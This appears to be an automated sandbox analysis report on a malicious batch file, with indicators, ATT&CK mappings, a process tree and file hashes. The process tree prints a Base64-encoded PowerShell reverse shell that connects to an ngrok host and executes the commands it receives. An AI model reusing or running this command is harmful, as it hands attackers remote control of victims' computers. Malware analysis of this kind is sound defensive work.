261dc38037d8e4783e705141b9d22cffbad0c9162b2d3341c726d4fc9b552acb

Analysis

max time kernel
149s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
09/04/2024, 18:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b1.bat
Size

1KB
MD5

f574f4276cc5e37332c6cf92ab73cc2b
SHA1

7bb6eb26d7ca4b64a1c07736ce401c56d4528289
SHA256

261dc38037d8e4783e705141b9d22cffbad0c9162b2d3341c726d4fc9b552acb
SHA512

e88efd77f1a291225dae4d9d7483190a6ef5e970593e72dc339aad226d978d3d5b8ae59f6062a1ffe14bcb9d96ea6f5e16c2c6693843580e0f57d45977dd679b

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	1792	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs

Web Service

T1102

flow	ioc
2	0.tcp.eu.ngrok.io

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133571621010064987"	chrome.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1792	powershell.exe
1792	powershell.exe
2452	chrome.exe
2452	chrome.exe
3916	chrome.exe
3916	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1792	powershell.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe
Token: SeCreatePagefilePrivilege	2452	chrome.exe
Token: SeShutdownPrivilege	2452	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe
2452	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2440 wrote to memory of 1792	2440	cmd.exe	79
PID 2440 wrote to memory of 1792	2440	cmd.exe	79
PID 1792 wrote to memory of 2452	1792	powershell.exe	80
PID 1792 wrote to memory of 2452	1792	powershell.exe	80
PID 2452 wrote to memory of 3704	2452	chrome.exe	81
PID 2452 wrote to memory of 3704	2452	chrome.exe	81
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4212	2452	chrome.exe	83
PID 2452 wrote to memory of 4196	2452	chrome.exe	84
PID 2452 wrote to memory of 4196	2452	chrome.exe	84
PID 2452 wrote to memory of 3452	2452	chrome.exe	85
PID 2452 wrote to memory of 3452	2452	chrome.exe	85
PID 2452 wrote to memory of 3452	2452	chrome.exe	85
PID 2452 wrote to memory of 3452	2452	chrome.exe	85
PID 2452 wrote to memory of 3452	2452	chrome.exe	85
PID 2452 wrote to memory of 3452	2452	chrome.exe	85
PID 2452 wrote to memory of 3452	2452	chrome.exe	85
PID 2452 wrote to memory of 3452	2452	chrome.exe	85
PID 2452 wrote to memory of 3452	2452	chrome.exe	85
PID 2452 wrote to memory of 3452	2452	chrome.exe	85
PID 2452 wrote to memory of 3452	2452	chrome.exe	85
PID 2452 wrote to memory of 3452	2452	chrome.exe	85
PID 2452 wrote to memory of 3452	2452	chrome.exe	85
PID 2452 wrote to memory of 3452	2452	chrome.exe	85
PID 2452 wrote to memory of 3452	2452	chrome.exe	85
PID 2452 wrote to memory of 3452	2452	chrome.exe	85
PID 2452 wrote to memory of 3452	2452	chrome.exe	85
PID 2452 wrote to memory of 3452	2452	chrome.exe	85

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\b1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2440
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -nop -EncodedCommand "JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMAAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACcALAAgADEANgAzADkAOQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAJAB3AHIAaQB0AGUAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAoACQAcwB0AHIAZQBhAG0AKQA7ACQAcgBlAGEAZABlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKAAkAHMAdAByAGUAYQBtACkAOwAkAHAAcgBvAG0AcAB0ACAAPQAgACcAUABTACAAJwAgACsAIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACkAIAArACAAJwA+ACAAJwA7AHcAaABpAGwAZQAoACQAdAByAHUAZQApAHsAJAB3AHIAaQB0AGUAcgAuAFcAcgBpAHQAZQAoACQAcAByAG8AbQBwAHQAKQA7ACQAdwByAGkAdABlAHIALgBGAGwAdQBzAGgAKAApADsAJABjAG8AbQBtAGEAbgBkACAAPQAgACQAcgBlAGEAZABlAHIALgBSAGUAYQBkAEwAaQBuAGUAKAApADsAaQBmACgAJABjAG8AbQBtAGEAbgBkACAALQBlAHEAIAAkAG4AdQBsAGwAKQB7AGIAcgBlAGEAawA7AH0AJABvAHUAdABwAHUAdAAgAD0AIAAoAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAYwBvAG0AbQBhAG4AZAAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwApADsAJAB3AHIAaQB0AGUAcgAuAFcAcgBpAHQAZQBMAGkAbgBlACgAJABvAHUAdABwAHUAdAApADsAJAB3AHIAaQB0AGUAcgAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1792
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --new-window https://pornhub.com/gay
    3⤵
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:2452
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffed9bc9758,0x7ffed9bc9768,0x7ffed9bc9778
      4⤵
      PID:3704
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1668 --field-trial-handle=1788,i,14666185339443185901,3397813790017380377,131072 /prefetch:2
      4⤵
      PID:4212
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1788,i,14666185339443185901,3397813790017380377,131072 /prefetch:8
      4⤵
      PID:4196
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2204 --field-trial-handle=1788,i,14666185339443185901,3397813790017380377,131072 /prefetch:8
      4⤵
      PID:3452
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3192 --field-trial-handle=1788,i,14666185339443185901,3397813790017380377,131072 /prefetch:1
      4⤵
      PID:3212
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3316 --field-trial-handle=1788,i,14666185339443185901,3397813790017380377,131072 /prefetch:1
      4⤵
      PID:2112
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4808 --field-trial-handle=1788,i,14666185339443185901,3397813790017380377,131072 /prefetch:1
      4⤵
      PID:1904
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 --field-trial-handle=1788,i,14666185339443185901,3397813790017380377,131072 /prefetch:8
      4⤵
      PID:2000
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4648 --field-trial-handle=1788,i,14666185339443185901,3397813790017380377,131072 /prefetch:8
      4⤵
      PID:2092
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3528 --field-trial-handle=1788,i,14666185339443185901,3397813790017380377,131072 /prefetch:8
      4⤵
      PID:2764
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2340 --field-trial-handle=1788,i,14666185339443185901,3397813790017380377,131072 /prefetch:2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3916

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3880

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
888B

MD5
a30354929a73f857b268d43b6ecbe84f

SHA1
00db941d9ad97c3dab8d3b364f4f79419dda10df

SHA256
8f52a43b279f65474c5501ce8c5c9b9211439a72f1b591c6d75685569cdcd1ff

SHA512
be7a0d11e07396a219140874d23105f7ad0711532129bebc00960be0821f96d28432bb7cef6ab95d927112caa465726eb442b530382152809abae007636e2b93

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
7e89acdff2d1bee1993db90a5c5e83d2

SHA1
ad3be5071a5238042bc23f4772f9e660d23439b7

SHA256
8b588e25a8bce8448ab35a14d705fdf7bf7ba0a789b4b2c28757d5ed2137c37a

SHA512
64f5f3977eaab8d89b04643ba3ffcffd98f6a4383dace8107511c6ede27f9c2bec9105a4c52fa30f447ea678c24e776baeffd7a6678c73ad427022f8354bd426

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
1824c75db6001e8be75bf5e8bcd8d0e3

SHA1
cbe2e7e8ad2b177f5d0f4a9293b030727125658d

SHA256
c0807d2c2ef81bc5387bdf3226dc9ae1f01521907d0882a444b8781d3c8c1e1f

SHA512
e001f285b0b6083e23e66d08f34aaee526785aab35e7a19c78c0d9859a9c1e3f3b8f27ffd76b88f3b6256f1084f3583b63e0bce30315371fdf49a27b0951d231

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
982b4f8a7baa1fbf74f3f47f70b628df

SHA1
d164be38d8938c68d2aafb03103ecd10d8d50f97

SHA256
99019b351d194d1b4c65224d44e0bfca44a5f4b846c53a1fd7cc36e862aec6a4

SHA512
79f5c72a37eaaa32a2e70f8b9f35c75cbb4a179b5395905cb37346dc47bdc91c2c94dd233c5fbb36f3e74c5f07af380b2b62cc2115c64ed7e4a992bca1149f58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
b8c43f231f0941b4c96b2b7f44bf2a61

SHA1
468616e4c176cd1d4b9b3c0b4ef41374b4529e43

SHA256
d699c5971dced3b2da6b596741450ee0b63e6ef09ef6c7dad7d94282c6c764f2

SHA512
70b431c471f544c98c4d424b6aed7abb9da7cc305595c0eb494390c954009c911f3634312580c8b580a76402b993f6c65b61e2c4ffec576011d3970422e44b44

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
4f3d1e8c9eeb53e5e4cb572321583043

SHA1
05f79e8d4686ce56061f51d6b1663f033f8cb106

SHA256
631ba9d11f5fc8515477e8f1f06336053b6ebb750b1360912e554b0c2449c605

SHA512
c5a2ab62c247c3496342d288cd912b3b9eb7f8b2ed80aadbfd871edc251085de313e07c8b5adbda54dd798e3ca68ad7ada99c37ff1b3a1938653ed2513698d0c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
fa51bae18cd876f9cec35830fccb40c1

SHA1
5e5586c1f037d075f64f60b5688b04f1dca30dc5

SHA256
da6f4f4eb7d53380c44f3a523b51c600aea40658d5e4e48cca4d65f947102837

SHA512
fd92bc45ed4e4ff2febd28b5680496e1f3f28a5bba6b5b5930c770c10bd4717c168cbd062a6e7c34c3c9bdd0f53579305c2326765dca9d711ecc3355980587de

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
538718cb5b95291bf9d5e2b01a102a46

SHA1
caebc49c6c4ae4206af2e18d571a2666a6b5336b

SHA256
eaec6fef6d8c9e092ce4ea8ad337b51c72cf9298e9544b50b1d5c2b97013b105

SHA512
db7a862ca376602225e68eeb1f32c2b38c7055685fd14fe364f56aa2bbc77e2e60d0f9c1f164085ffb45549c28a23b62de8d2c0b786babd37529ee1d32a801ff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57cdfe.TMP

Filesize
48B

MD5
366034959da5a209659df7a6ccec0b11

SHA1
27216e065553fc59ccd71a1223a7104d3159dcfa

SHA256
98b8146aaf1d547bef47169e5a546b9632adfc752553f339b1f8a6cc5bd2cb7d

SHA512
8b220fead92ef7c125d4962a5d496442e604aa2f60301671243c622bb7d1ea334cc78e725419e10428c3cdc6260a08df4fe602f2bd7a45dbe09edeb48ada7d3b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
261KB

MD5
9b3551e733e38e070e662b15e9506e86

SHA1
213391426387c4a8bfa01d39426cfdccefbd9740

SHA256
892f28c86af07790912524b6159f163b3c753d11593bc7c457139691da70a296

SHA512
49d22f0a8dbf3741d14644b383b7adeed821f69868a7973624b14022a9aedd08bd3b2ec81665ff1f0bb5d3d753cdafee3d1ee4f5ad0733c9fe701484dc861772

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ph4n115y.lhx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1792-138-0x000001C2A7CD0000-0x000001C2A7CE0000-memory.dmp

Filesize
64KB

Download
memory/1792-150-0x00007FFEE08A0000-0x00007FFEE1362000-memory.dmp

Filesize
10.8MB

Download
memory/1792-137-0x000001C2A7CD0000-0x000001C2A7CE0000-memory.dmp

Filesize
64KB

Download
memory/1792-136-0x00007FFEE08A0000-0x00007FFEE1362000-memory.dmp

Filesize
10.8MB

Download
memory/1792-10-0x000001C2A7CD0000-0x000001C2A7CE0000-memory.dmp

Filesize
64KB

Download
memory/1792-11-0x000001C2A7CD0000-0x000001C2A7CE0000-memory.dmp

Filesize
64KB

Download
memory/1792-9-0x00007FFEE08A0000-0x00007FFEE1362000-memory.dmp

Filesize
10.8MB

Download
memory/1792-8-0x000001C2A7CE0000-0x000001C2A7D02000-memory.dmp

Filesize
136KB

Download